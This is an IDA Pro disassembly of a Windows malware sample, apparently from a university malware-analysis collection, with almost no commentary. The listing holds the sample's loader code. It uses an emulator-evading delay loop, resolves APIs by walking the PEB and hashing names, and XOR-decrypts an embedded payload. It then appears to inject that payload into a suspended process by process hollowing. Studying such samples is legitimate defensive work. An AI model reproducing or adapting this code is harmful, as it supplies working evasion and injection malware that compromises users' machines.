;
; +-------------------------------------------------------------------------+
; |   This file	has been generated by The Interactive Disassembler (IDA)    |
; |	   Copyright (c) 2010 by Hex-Rays, <support@hex-rays.com>	    |
; |			 License info: 48-B231-7414-99			    |
; |		       NCFTA Canada/Concordia University		    |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; |   This file	has been generated by The Interactive Disassembler (IDA)    |
; |	   Copyright (c) 2010 by Hex-Rays, <support@hex-rays.com>	    |
; |			 License info: 48-B231-7414-99			    |
; |		       NCFTA Canada/Concordia University		    |
; +-------------------------------------------------------------------------+
;
; Input	MD5   :	0CD3FC7FF3660EEF940C1CAA572415FB
; Input	CRC32 :	89F4BC40

; File Name   :	C:\Users\farhadi\Desktop\509_Malware\0cd3fc7ff3660eef940c1caa572415fb
; Format      :	Portable executable for	80386 (PE)
; Imagebase   :	400000
; Section 1. (virtual address 00001000)
; Virtual size			: 00002FE6 (  12262.)
; Section size in file		: 00003000 (  12288.)
; Offset to raw	data for section: 00001000
; Flags	E0000060: Text Data Executable Readable	Writable
; Alignment	: default
; OS type	  :  MS	Windows
; Application type:  Executable	32bit

		include	uni.inc	; see unicode subdir of	ida for	info on	unicode

		.686p
		.mmx
		.model flat

; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
_text		segment	para public 'CODE' use32
		assume cs:_text
		;org 401000h
		assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401001	proc near		; CODE XREF: sub_401078:loc_4010DEp
					; WinMain(x,x,x,x)+2Fp

SrcStr		= word ptr -10h
DestStr		= word ptr -8

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	esi
		push	edi
		mov	esi, offset aKuee ; "kuee"
		lea	edi, [ebp+SrcStr]
		movsd
		movsb
		mov	esi, offset aFjfd ; "fjfd"
		lea	edi, [ebp+DestStr]
		movsd
		movsb
		xor	esi, esi

loc_40101F:				; CODE XREF: sub_401001+3Bj
		lea	eax, [ebp+DestStr]
		push	3		; cchDest
		push	eax		; lpDestStr
		lea	eax, [ebp+SrcStr]
		push	3		; cchSrc
		push	eax		; lpSrcStr
		push	0		; dwMapFlags
		push	0		; Locale
		inc	esi
		call	ds:LCMapStringW
		cmp	esi, 73035Dh
		jnz	short loc_40101F
		pop	edi
		pop	esi
		leave
		retn
sub_401001	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401042	proc near		; CODE XREF: WinMain(x,x,x,x)+34p

var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	eax, large fs:30h
		add	eax, 0Ch
		mov	eax, [eax]
		mov	[ebp+var_4], eax
		mov	eax, [ebp+var_4]
		xor	ecx, ecx
		mov	eax, [eax+0Ch]

loc_40105C:				; CODE XREF: sub_401042+2Fj
		mov	eax, [eax]
		test	ecx, ecx
		jnz	short loc_40106B
		mov	edx, [eax+18h]
		mov	dword_405B08, edx

loc_40106B:				; CODE XREF: sub_401042+1Ej
		cmp	ecx, 1
		jz	short loc_401073
		inc	ecx
		jmp	short loc_40105C
; ---------------------------------------------------------------------------

loc_401073:				; CODE XREF: sub_401042+2Cj
		mov	eax, [eax+18h]
		leave
		retn
sub_401042	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401078	proc near		; CODE XREF: WinMain(x,x,x,x)+64p
					; WinMain(x,x,x,x)+A4p	...

arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		mov	eax, dword_405B24
		push	edi
		xor	edi, edi
		cmp	[eax+18h], edi
		jbe	short loc_4010C6

loc_401088:				; CODE XREF: sub_401078+4Cj
		mov	eax, dword_405AB0
		mov	eax, [eax+edi*4]
		add	eax, dword_405B28
		xor	edx, edx

loc_401098:				; CODE XREF: sub_401078+3Cj
		mov	cl, [eax]
		test	cl, cl
		jz	short loc_4010B6
		movzx	ecx, cl
		or	ecx, 60h
		add	edx, ecx
		punpcklqdq xmm4, xmm7
		cvtps2pi mm2, xmm1
		shufps	xmm3, xmm1, 23h
		shl	edx, 1
		inc	eax
		jmp	short loc_401098
; ---------------------------------------------------------------------------

loc_4010B6:				; CODE XREF: sub_401078+24j
		cmp	edx, [ebp+arg_0]
		jz	short loc_4010CB
		mov	eax, dword_405B24
		inc	edi
		cmp	edi, [eax+18h]
		jb	short loc_401088

loc_4010C6:				; CODE XREF: sub_401078+Ej
		xor	eax, eax

loc_4010C8:				; CODE XREF: sub_401078+D9j
		pop	edi
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_4010CB:				; CODE XREF: sub_401078+41j
		cmp	[ebp+arg_0], 1A096Eh
		push	esi
		jz	short loc_4010DE
		cmp	[ebp+arg_0], 702E1A8h
		jnz	short loc_401138

loc_4010DE:				; CODE XREF: sub_401078+5Bj
		call	sub_401001
		call	nullsub_1
		cmp	eax, 1
		mov	esi, offset _WinMain@16	; WinMain(x,x,x,x)
		jnz	short loc_4010F8
		mov	dword_405B28, esi

loc_4010F8:				; CODE XREF: sub_401078+78j
		call	nullsub_1
		cmp	eax, 1
		jnz	short loc_401108
		mov	dword_405B28, esi

loc_401108:				; CODE XREF: sub_401078+88j
		call	nullsub_1
		cmp	eax, 1
		jnz	short loc_401118
		mov	dword_405B28, esi

loc_401118:				; CODE XREF: sub_401078+98j
		call	nullsub_1
		cmp	eax, 1
		jnz	short loc_401128
		mov	dword_405B28, esi

loc_401128:				; CODE XREF: sub_401078+A8j
		call	nullsub_1
		cmp	eax, 1
		jnz	short loc_401138
		mov	dword_405B28, esi

loc_401138:				; CODE XREF: sub_401078+64j
					; sub_401078+B8j
		mov	eax, dword_4057D4
		mov	ecx, dword_4057D0
		pop	esi
		movzx	eax, word ptr [eax+edi*2]
		mov	eax, [ecx+eax*4]
		add	eax, dword_405B28
		jmp	loc_4010C8
sub_401078	endp


; =============== S U B	R O U T	I N E =======================================


sub_401156	proc near		; CODE XREF: WinMain(x,x,x,x)+3Ep
					; WinMain(x,x,x,x):loc_401247p
		push	esi
		call	nullsub_1
		mov	eax, dword_405B28
		mov	ecx, [eax+3Ch]
		lea	esi, [ecx+eax+18h]
		call	nullsub_1
		mov	eax, [esi+60h]
		mov	ecx, dword_405B28
		add	eax, ecx
		mov	dword_405B24, eax
		mov	edx, [eax+20h]
		add	edx, ecx
		mov	dword_405AB0, edx
		mov	eax, [eax+24h]
		add	eax, ecx
		mov	dword_4057D4, eax
		call	nullsub_1
		mov	eax, dword_405B24
		pop	esi
		mov	eax, [eax+1Ch]
		add	eax, dword_405B28
		mov	dword_4057D0, eax
		xor	eax, eax
		retn
sub_401156	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

; int __stdcall	WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
_WinMain@16	proc near		; CODE XREF: start+DBp
					; DATA XREF: sub_401078+73o ...

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_2		= word ptr -2
hInstance	= dword	ptr  8
hPrevInstance	= dword	ptr  0Ch
lpCmdLine	= dword	ptr  10h
nShowCmd	= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		mov	eax, dword_40508C
		push	ebx
		mov	[ebp+var_C], eax
		mov	ax, word_405088
		push	esi
		push	edi
		mov	[ebp+var_2], ax
		call	nullsub_1
		call	nullsub_1
		call	nullsub_1
		call	nullsub_1
		call	sub_401001
		call	sub_401042
		mov	dword_405B28, eax
		call	sub_401156
		call	nullsub_1
		cmp	eax, 1
		mov	ebx, offset _WinMain@16	; WinMain(x,x,x,x)
		jnz	short loc_401206
		mov	dword_405B28, ebx

loc_401206:				; CODE XREF: WinMain(x,x,x,x)+50j
		mov	esi, offset dword_405AC0
		mov	edi, offset dword_405030

loc_401210:				; CODE XREF: WinMain(x,x,x,x)+78j
		push	dword ptr [edi]
		call	sub_401078
		mov	[esi], eax
		add	edi, 4
		add	esi, 4
		cmp	edi, offset dword_405070
		pop	ecx
		jl	short loc_401210
		call	nullsub_1
		mov	eax, dword_405B08
		mov	dword_405B28, eax
		call	nullsub_1
		cmp	eax, 1
		jnz	short loc_401247
		mov	dword_405B28, ebx

loc_401247:				; CODE XREF: WinMain(x,x,x,x)+91j
		call	sub_401156
		push	dword_405070
		call	sub_401078
		push	dword_405074
		mov	[esi], eax
		call	sub_401078
		pop	ecx
		mov	[esi+4], eax
		pop	ecx
		call	nullsub_1
		cmp	eax, 1
		jnz	short loc_401279
		mov	dword_405B28, ebx

loc_401279:				; CODE XREF: WinMain(x,x,x,x)+C3j
		mov	eax, [ebp+lpCmdLine]
		mov	dword_405AAC, eax
		call	nullsub_1
		cmp	eax, 1
		jnz	short loc_401291
		mov	dword_405B28, ebx

loc_401291:				; CODE XREF: WinMain(x,x,x,x)+DBj
		call	nullsub_1
		lea	eax, [ebp+var_C]
		push	7
		xor	edi, edi
		push	eax
		push	edi
		call	dword_405AC0
		push	eax
		push	edi
		call	dword_405AC4
		push	eax
		call	dword_405AC8
		mov	esi, eax
		call	nullsub_1
		lea	eax, [ebp+var_2]
		push	8
		push	eax
		push	edi
		call	dword_405AC0
		push	eax
		push	edi
		call	dword_405AC4
		push	eax
		call	dword_405AC8
		lea	ecx, [ebp+var_10]
		mov	ebx, eax
		sub	eax, esi
		push	ecx
		push	4
		push	eax
		push	esi
		mov	[ebp+var_8], eax
		mov	[ebp+var_10], edi
		call	dword_405AFC
		call	nullsub_1
		call	dword_405ADC
		mov	ecx, [ebp+var_8]
		lea	ecx, [ecx+ecx*2]
		push	ecx		; dwBytes
		push	8		; dwFlags
		push	eax		; hHeap
		call	ds:HeapAlloc
		mov	[ebp+lpCmdLine], eax

loc_40130D:				; CODE XREF: WinMain(x,x,x,x)+173j
		cmp	esi, ebx
		jz	short loc_401323
		xor	eax, eax

loc_401313:				; CODE XREF: WinMain(x,x,x,x)+170j
		mov	cl, [ebx+eax]
		xor	[esi], cl
		inc	eax
		cmp	eax, 168h
		jl	short loc_401313
		inc	esi
		jmp	short loc_40130D
; ---------------------------------------------------------------------------

loc_401323:				; CODE XREF: WinMain(x,x,x,x)+161j
		sub	esi, [ebp+var_8]
		call	nullsub_1
		lea	eax, [ebp+var_8]
		push	eax
		mov	eax, [ebp+var_8]
		push	eax
		push	esi
		lea	eax, [eax+eax*2]
		push	eax
		push	[ebp+lpCmdLine]
		push	102h
		call	dword_405B04
		call	nullsub_1
		pop	edi
		pop	esi
		cmp	eax, 1
		pop	ebx
		jnz	short loc_40135D
		mov	dword_405B28, offset _WinMain@16 ; WinMain(x,x,x,x)

loc_40135D:				; CODE XREF: WinMain(x,x,x,x)+1A3j
		push	offset dword_405AC0
		push	[ebp+lpCmdLine]
		call	sub_4013DC
		pop	ecx
		xor	eax, eax
		pop	ecx
		leave
		retn	10h
_WinMain@16	endp


; =============== S U B	R O U T	I N E =======================================


sub_401372	proc near		; CODE XREF: sub_4013DC+105p

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		push	edi
		mov	edi, offset dword_4057E0
		push	edi
		push	dword_405B14
		call	dword ptr [esi+28h]
		mov	eax, dword_405B20
		push	0
		add	eax, 34h
		push	4
		push	eax
		mov	eax, dword_405884
		add	eax, 8
		push	eax
		push	dword_405B10
		call	dword ptr [esi+10h]
		mov	eax, dword_405B20
		mov	eax, [eax+28h]
		mov	dword_405890, eax
		call	nullsub_1
		mov	eax, dword_405B20
		push	edi
		push	dword_405B14
		mov	eax, [eax+34h]
		add	dword_405890, eax
		call	dword ptr [esi+30h]
		push	dword_405B14
		call	dword ptr [esi+34h]
		pop	edi
		pop	esi
		retn
sub_401372	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_4013DC	proc near		; CODE XREF: WinMain(x,x,x,x)+1B7p

var_144		= byte ptr -144h
var_44		= dword	ptr -44h
var_40		= byte ptr -40h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 144h
		push	ebx
		push	esi
		push	edi
		mov	esi, [ebp+arg_4]
		push	10h
		xor	eax, eax
		pop	ecx
		lea	edi, [ebp+var_40]
		rep stosd
		lea	eax, [ebp+var_144]
		push	0FFh
		xor	ebx, ebx
		push	eax
		push	ebx
		mov	[ebp+var_44], 44h
		mov	dword_4057E0, 10007h
		call	dword ptr [esi+24h]
		mov	edi, [ebp+arg_0]
		push	offset dword_405B10
		mov	eax, [edi+3Ch]
		add	eax, edi
		mov	dword_405B20, eax
		lea	eax, [ebp+var_44]
		push	eax
		push	ebx
		push	ebx
		push	4
		push	ebx
		push	ebx
		push	ebx
		lea	eax, [ebp+var_144]
		push	dword_405AAC
		push	eax
		call	dword ptr [esi+2Ch]
		mov	eax, dword_405B20
		push	dword ptr [eax+34h]
		push	dword_405B10
		call	dword ptr [esi+40h]
		mov	eax, dword_405B20
		push	40h
		push	3000h
		push	dword ptr [eax+50h]
		push	dword ptr [eax+34h]
		push	dword_405B10
		call	dword ptr [esi+38h]
		mov	eax, dword_405B20
		push	ebx
		push	dword ptr [eax+54h]
		push	edi
		push	dword ptr [eax+34h]
		push	dword_405B10
		call	dword ptr [esi+10h]
		mov	eax, dword_405B20
		mov	[ebp+arg_0], ebx
		cmp	[eax+6], bx
		jbe	short loc_4014E0
		mov	[ebp+arg_4], ebx

loc_401498:				; CODE XREF: sub_4013DC+102j
		mov	ecx, [ebp+arg_4]
		mov	eax, [eax+34h]
		add	ecx, [edi+3Ch]
		push	ebx
		mov	edx, [ecx+edi+10Ch]
		push	dword ptr [ecx+edi+108h]
		add	eax, [ecx+edi+104h]
		lea	ecx, [ecx+edi+0F8h]
		add	edx, edi
		push	edx
		push	eax
		push	dword_405B10
		call	dword ptr [esi+10h]
		mov	eax, dword_405B20
		inc	[ebp+arg_0]
		add	[ebp+arg_4], 28h
		movzx	ecx, word ptr [eax+6]
		cmp	[ebp+arg_0], ecx
		jl	short loc_401498

loc_4014E0:				; CODE XREF: sub_4013DC+B7j
		push	esi
		call	sub_401372
		pop	ecx
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_4013DC	endp

; [000000E9 BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		mov	eax, [ebp-14h]
		mov	ecx, [eax]
		mov	ecx, [ecx]
		mov	[ebp-68h], ecx
		push	eax
		push	ecx
		call	__XcptFilter
		pop	ecx
		pop	ecx
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp-18h]
		push	dword ptr [ebp-68h]
		call	__exit
; [00000022 BYTES: COLLAPSED FUNCTION __amsg_exit. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		pop	ecx
		pop	ecx
		retn
; [00000023 BYTES: COLLAPSED FUNCTION _fast_error_exit.	PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		retn
; [0000002D BYTES: COLLAPSED FUNCTION __cinit. PRESS KEYPAD "+"	TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION _exit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __exit. PRESS KEYPAD "+" TO EXPAND]
; [000000A3 BYTES: COLLAPSED FUNCTION _doexit. PRESS KEYPAD "+"	TO EXPAND]
; ---------------------------------------------------------------------------
		pop	edi
		retn
; [00000009 BYTES: COLLAPSED FUNCTION __lockexit. PRESS	KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION __unlockexit. PRESS KEYPAD "+" TO	EXPAND]
; [0000001A BYTES: COLLAPSED FUNCTION __initterm. PRESS	KEYPAD "+" TO EXPAND]
; [0000013E BYTES: COLLAPSED FUNCTION __XcptFilter. PRESS KEYPAD "+" TO	EXPAND]
; [0000003A BYTES: COLLAPSED FUNCTION _xcptlookup. PRESS KEYPAD	"+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION __wincmdln. PRESS	KEYPAD "+" TO EXPAND]
; [000000B9 BYTES: COLLAPSED FUNCTION __setenvp. PRESS KEYPAD "+" TO EXPAND]
; [00000099 BYTES: COLLAPSED FUNCTION __setargv. PRESS KEYPAD "+" TO EXPAND]
; [000001B4 BYTES: COLLAPSED FUNCTION _parse_cmdline. PRESS KEYPAD "+" TO EXPAND]
; [00000132 BYTES: COLLAPSED FUNCTION ___crtGetEnvironmentStringsA. PRESS KEYPAD "+" TO	EXPAND]
; [000001BC BYTES: COLLAPSED FUNCTION __ioinit.	PRESS KEYPAD "+" TO EXPAND]
; [00000054 BYTES: COLLAPSED FUNCTION __mtinit.	PRESS KEYPAD "+" TO EXPAND]
; [00000013 BYTES: COLLAPSED FUNCTION __initptd. PRESS KEYPAD "+" TO EXPAND]
; [00000067 BYTES: COLLAPSED FUNCTION __getptd.	PRESS KEYPAD "+" TO EXPAND]
; [0000003C BYTES: COLLAPSED FUNCTION __heap_init. PRESS KEYPAD	"+" TO EXPAND]
		align 4
; [00000020 BYTES: COLLAPSED FUNCTION __global_unwind2.	PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __unwind_handler.	PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION __local_unwind2. PRESS KEYPAD "+"	TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __abnormal_termination. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

__NLG_Notify1:
		push	ebx
		push	ecx
		mov	ebx, offset dword_40514C
		jmp	short loc_40210C
; [00000018 BYTES: COLLAPSED FUNCTION __NLG_Notify. PRESS KEYPAD "+" TO	EXPAND]
		align 4
		push	esi
		inc	ebx
		xor	dh, [eax]
		pop	eax
		inc	ebx
		xor	[eax], dh
; [000000BD BYTES: COLLAPSED FUNCTION unknown_libname_1. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

unknown_libname_2:			; Microsoft VisualC 2-10/net runtime
		push	ebp
		mov	ecx, [esp+8]
		mov	ebp, [ecx]
		mov	eax, [ecx+1Ch]
		push	eax
		mov	eax, [ecx+18h]
		push	eax
		call	__local_unwind2
		add	esp, 8
		pop	ebp
		retn	4
; [00000039 BYTES: COLLAPSED FUNCTION __FF_MSGBANNER. PRESS KEYPAD "+" TO EXPAND]
; [00000153 BYTES: COLLAPSED FUNCTION __NMSG_WRITE. PRESS KEYPAD "+" TO	EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION __mtinitlocks. PRESS KEYPAD "+" TO EXPAND]
; [00000061 BYTES: COLLAPSED FUNCTION __lock. PRESS KEYPAD "+" TO EXPAND]
; [00000015 BYTES: COLLAPSED FUNCTION __unlock.	PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbblead. PRESS KEYPAD	"+" TO EXPAND]
; [00000031 BYTES: COLLAPSED FUNCTION _x_ismbbtype. PRESS KEYPAD "+" TO	EXPAND]
; [000001AD BYTES: COLLAPSED FUNCTION __setmbcp. PRESS KEYPAD "+" TO EXPAND]
; [0000004A BYTES: COLLAPSED FUNCTION _getSystemCP. PRESS KEYPAD "+" TO	EXPAND]
; [00000033 BYTES: COLLAPSED FUNCTION _CPtoLCID. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION _setSBCS.	PRESS KEYPAD "+" TO EXPAND]
; [00000185 BYTES: COLLAPSED FUNCTION _setSBUpLow. PRESS KEYPAD	"+" TO EXPAND]
; [0000001C BYTES: COLLAPSED FUNCTION ___initmbctable. PRESS KEYPAD "+"	TO EXPAND]
; [00000048 BYTES: COLLAPSED FUNCTION _free. PRESS KEYPAD "+" TO EXPAND]
		align 10h
; [00000007 BYTES: COLLAPSED FUNCTION _strcpy. PRESS KEYPAD "+"	TO EXPAND]
		align 10h
; [000000E0 BYTES: COLLAPSED FUNCTION _strcat. PRESS KEYPAD "+"	TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _malloc. PRESS KEYPAD "+"	TO EXPAND]
; [0000002C BYTES: COLLAPSED FUNCTION __nh_malloc. PRESS KEYPAD	"+" TO EXPAND]
; [0000004E BYTES: COLLAPSED FUNCTION __heap_alloc. PRESS KEYPAD "+" TO	EXPAND]
		align 10h
; [0000007B BYTES: COLLAPSED FUNCTION _strlen. PRESS KEYPAD "+"	TO EXPAND]
		align 10h
; [00000335 BYTES: COLLAPSED FUNCTION _memcpy. PRESS KEYPAD "+"	TO EXPAND]
; [0000008D BYTES: COLLAPSED FUNCTION _calloc. PRESS KEYPAD "+"	TO EXPAND]
; [0000003E BYTES: COLLAPSED FUNCTION ___sbh_heap_init.	PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION ___sbh_find_block. PRESS KEYPAD "+" TO EXPAND]
; [0000032B BYTES: COLLAPSED FUNCTION ___sbh_free_block. PRESS KEYPAD "+" TO EXPAND]
; [00000309 BYTES: COLLAPSED FUNCTION ___sbh_alloc_block. PRESS	KEYPAD "+" TO EXPAND]
; [000000B1 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_region. PRESS KEYPAD "+"	TO EXPAND]
; [000000FB BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_group. PRESS KEYPAD "+" TO EXPAND]
; [00000089 BYTES: COLLAPSED FUNCTION ___crtMessageBoxA. PRESS KEYPAD "+" TO EXPAND]
		align 10h
; [000000FE BYTES: COLLAPSED FUNCTION _strncpy.	PRESS KEYPAD "+" TO EXPAND]
; [00000224 BYTES: COLLAPSED FUNCTION ___crtLCMapStringA. PRESS	KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION _strncnt.	PRESS KEYPAD "+" TO EXPAND]
; [00000149 BYTES: COLLAPSED FUNCTION ___crtGetStringTypeA. PRESS KEYPAD "+" TO	EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION __callnewh. PRESS	KEYPAD "+" TO EXPAND]
		align 10h
; [00000058 BYTES: COLLAPSED FUNCTION _memset. PRESS KEYPAD "+"	TO EXPAND]
		align 10h
; [00000335 BYTES: COLLAPSED FUNCTION _memcpy_0. PRESS KEYPAD "+" TO EXPAND]
		align 10h
; [0000002F BYTES: COLLAPSED FUNCTION __alloca_probe. PRESS KEYPAD "+" TO EXPAND]
		align 10h
; [00000006 BYTES: COLLAPSED FUNCTION RtlUnwind. PRESS KEYPAD "+" TO EXPAND]
		align 20h
_text		ends

; Section 2. (virtual address 00004000)
; Virtual size			: 00000824 (   2084.)
; Section size in file		: 00001000 (   4096.)
; Offset to raw	data for section: 00004000
; Flags	40000040: Data Readable
; Alignment	: default
;
; Imports from KERNEL32.dll
;
; ===========================================================================

; Segment type:	Externs
; _idata
; int __stdcall	LCMapStringW(LCID Locale, DWORD	dwMapFlags, LPCWSTR lpSrcStr, int cchSrc, LPWSTR lpDestStr, int	cchDest)
		extrn LCMapStringW:dword ; CODE	XREF: sub_401001+2Fp
					; ___crtLCMapStringA+42p ...
; LPVOID __stdcall HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes)
		extrn HeapAlloc:dword	; CODE XREF: WinMain(x,x,x,x)+156p
					; __heap_alloc+45p ...
; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
		extrn GetModuleHandleA:dword ; CODE XREF: start+D4p
					; DATA XREF: start+D4r
; void __stdcall GetStartupInfoA(LPSTARTUPINFOA	lpStartupInfo)
		extrn GetStartupInfoA:dword ; CODE XREF: start+B1p
					; __ioinit+5Ep
					; DATA XREF: ...
; LPSTR	__stdcall GetCommandLineA()
		extrn GetCommandLineA:dword ; CODE XREF: start+86p
					; DATA XREF: start+86r
; DWORD	__stdcall GetVersion()
		extrn GetVersion:dword	; CODE XREF: start+26p
					; DATA XREF: start+26r
; void __stdcall ExitProcess(UINT uExitCode)
		extrn ExitProcess:dword	; CODE XREF: _fast_error_exit+1Dp
					; _doexit+9Dp
					; DATA XREF: ...
; BOOL __stdcall TerminateProcess(HANDLE hProcess, UINT	uExitCode)
		extrn TerminateProcess:dword ; CODE XREF: _doexit+1Cp
					; DATA XREF: _doexit+1Cr
; HANDLE __stdcall GetCurrentProcess()
		extrn GetCurrentProcess:dword ;	CODE XREF: _doexit+15p
					; DATA XREF: _doexit+15r
; LONG __stdcall UnhandledExceptionFilter(struct _EXCEPTION_POINTERS *ExceptionInfo)
		extrn UnhandledExceptionFilter:dword ; CODE XREF: __XcptFilter+134p
					; DATA XREF: __XcptFilter+134r
; DWORD	__stdcall GetModuleFileNameA(HMODULE hModule, LPCH lpFilename, DWORD nSize)
		extrn GetModuleFileNameA:dword ; CODE XREF: __setargv+23p
					; __NMSG_WRITE+6Dp
					; DATA XREF: ...
; BOOL __stdcall FreeEnvironmentStringsA(LPCH)
		extrn FreeEnvironmentStringsA:dword
					; CODE XREF: ___crtGetEnvironmentStringsA+11Fp
					; DATA XREF: ___crtGetEnvironmentStringsA+11Fr
; BOOL __stdcall FreeEnvironmentStringsW(LPWCH)
		extrn FreeEnvironmentStringsW:dword
					; CODE XREF: ___crtGetEnvironmentStringsA+CEp
					; DATA XREF: ___crtGetEnvironmentStringsA+CEr
; int __stdcall	WideCharToMultiByte(UINT CodePage, DWORD dwFlags, LPCWSTR lpWideCharStr, int cchWideChar, LPSTR	lpMultiByteStr,	int cbMultiByte, LPCSTR	lpDefaultChar, LPBOOL lpUsedDefaultChar)
		extrn WideCharToMultiByte:dword
					; CODE XREF: ___crtGetEnvironmentStringsA+93p
					; ___crtGetEnvironmentStringsA+B5p ...
; LPCH __stdcall GetEnvironmentStrings()
		extrn GetEnvironmentStrings:dword
					; CODE XREF: ___crtGetEnvironmentStringsA:loc_401C62p
					; ___crtGetEnvironmentStringsA+E1p
					; DATA XREF: ...
; LPWCH	__stdcall GetEnvironmentStringsW()
		extrn GetEnvironmentStringsW:dword
					; CODE XREF: ___crtGetEnvironmentStringsA+1Bp
					; ___crtGetEnvironmentStringsA+5Bp
					; DATA XREF: ...
; UINT __stdcall SetHandleCount(UINT uNumber)
		extrn SetHandleCount:dword ; CODE XREF:	__ioinit+1B1p
					; DATA XREF: __ioinit+1B1r
; HANDLE __stdcall GetStdHandle(DWORD nStdHandle)
		extrn GetStdHandle:dword ; CODE	XREF: __ioinit+16Cp
					; __NMSG_WRITE+143p
					; DATA XREF: ...
; DWORD	__stdcall GetFileType(HANDLE hFile)
		extrn GetFileType:dword	; CODE XREF: __ioinit+109p
					; __ioinit+17Ap
					; DATA XREF: ...
; DWORD	__stdcall GetCurrentThreadId()
		extrn GetCurrentThreadId:dword ; CODE XREF: __mtinit+3Fp
					; __getptd+45p
					; DATA XREF: ...
; BOOL __stdcall TlsSetValue(DWORD dwTlsIndex, LPVOID lpTlsValue)
		extrn TlsSetValue:dword	; CODE XREF: __mtinit+2Ep __getptd+34p
					; DATA XREF: ...
; DWORD	__stdcall TlsAlloc()
		extrn TlsAlloc:dword	; CODE XREF: __mtinit+6p
					; DATA XREF: __mtinit+6r
; void __stdcall SetLastError(DWORD dwErrCode)
		extrn SetLastError:dword ; CODE	XREF: __getptd+5Cp
					; DATA XREF: __getptd+5Cr
; LPVOID __stdcall TlsGetValue(DWORD dwTlsIndex)
		extrn TlsGetValue:dword	; CODE XREF: __getptd+10p
					; DATA XREF: __getptd+10r
; DWORD	__stdcall GetLastError()
		extrn GetLastError:dword ; CODE	XREF: __getptd+2p
					; DATA XREF: __getptd+2r
; BOOL __stdcall HeapDestroy(HANDLE hHeap)
		extrn HeapDestroy:dword	; CODE XREF: __heap_init+2Fp
					; DATA XREF: __heap_init+2Fr
; HANDLE __stdcall HeapCreate(DWORD flOptions, SIZE_T dwInitialSize, SIZE_T dwMaximumSize)
		extrn HeapCreate:dword	; CODE XREF: __heap_init+11p
					; DATA XREF: __heap_init+11r
; BOOL __stdcall VirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType)
		extrn VirtualFree:dword	; CODE XREF: ___sbh_free_block+257p
					; ___sbh_free_block+2B2p
					; DATA XREF: ...
; BOOL __stdcall HeapFree(HANDLE hHeap,	DWORD dwFlags, LPVOID lpMem)
		extrn HeapFree:dword	; CODE XREF: _free+40p
					; ___sbh_free_block+2C4p ...
		extrn __imp_RtlUnwind:dword ; DATA XREF: RtlUnwindr
; BOOL __stdcall WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite,	LPDWORD	lpNumberOfBytesWritten,	LPOVERLAPPED lpOverlapped)
		extrn WriteFile:dword	; CODE XREF: __NMSG_WRITE+14Ap
					; DATA XREF: __NMSG_WRITE+14Ar
; void __stdcall InitializeCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
		extrn InitializeCriticalSection:dword ;	CODE XREF: __mtinitlocks+Dp
					; __mtinitlocks+15p ...
; void __stdcall EnterCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
		extrn EnterCriticalSection:dword ; CODE	XREF: __lock+58p
					; DATA XREF: __lock+58r
; void __stdcall LeaveCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
		extrn LeaveCriticalSection:dword ; CODE	XREF: __unlock+Dp
					; DATA XREF: __unlock+Dr
; BOOL __stdcall GetCPInfo(UINT	CodePage, LPCPINFO lpCPInfo)
		extrn GetCPInfo:dword	; CODE XREF: __setmbcp+51p
					; _setSBUpLow+14p
					; DATA XREF: ...
; UINT __stdcall GetACP()
		extrn GetACP:dword	; DATA XREF: _getSystemCP+2Fr
